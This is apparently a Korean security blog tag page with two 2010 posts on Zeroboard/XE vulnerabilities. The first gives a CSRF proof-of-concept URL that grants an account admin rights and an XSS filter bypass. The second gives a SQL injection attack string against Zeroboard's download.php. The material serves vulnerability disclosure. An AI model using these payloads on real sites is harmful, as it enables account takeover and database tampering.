'zeroboard'에 해당되는 글 2건

  1. 2010.04.16 XE 1.4.0.10 XSS/CSRF 취약점
  2. 2010.01.26 Zeroboard에서 발생한 Mass Sql Injection
XE개발자분들 고생이 많네요

이번에 발견된 CSRF취약점은 특정 계정을 관리자 권한으로 올릴수 있는 취약점입니다. 널루트에서 발견했고요 poc를 발표했습니다.

<object type="text/x-scriptlet" data="http://test.com/xe/index.php?member_srl= 숫자&user_id=아이디& user_name=사용자이름&nick_name=닉네임&email_address=이메일주소& allow_mailing=Y&is_admin=Y&group_srl_list=2&module=member&act=procMemberAdminInsert" height="0" width="0"></object>


XSS취약점은 이벤트 태그를 차단하는 정규식에서 우회방법이 존재하는 문제였습니다.

이건 걸리지만
<img src="xxx" onload=XSS>

이건 안걸려요ㅋㅋ
<img src="xxx"onload=XSS>

그래서 이번 패치에서는 func.inc.php파일 내용이 다음과 같이 변경이 되었습니다.
/(\r|\n| |\t|\"|\'|\/|\`)+on(click|........


'vulnerability' 카테고리의 다른 글

LNK 파일 생성기(Windows LNK Vulnerability)  (1) 2010.07.27
html file upload form  (0) 2010.06.24
Java Deployment Toolkit Test Page  (0) 2010.04.19
FCK Editor  (0) 2010.04.11
Zeroboard에서 발생한 Mass Sql Injection  (0) 2010.01.26
Posted by applicationlayer
:
참고: http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1

취약쿼리실행

update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'

공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6

1=download1 의 경우 임의의 문자삽입 가능
예)
2=111



'vulnerability' 카테고리의 다른 글

LNK 파일 생성기(Windows LNK Vulnerability)  (1) 2010.07.27
html file upload form  (0) 2010.06.24
Java Deployment Toolkit Test Page  (0) 2010.04.19
XE 1.4.0.10 XSS/CSRF 취약점  (0) 2010.04.16
FCK Editor  (0) 2010.04.11
Posted by applicationlayer
: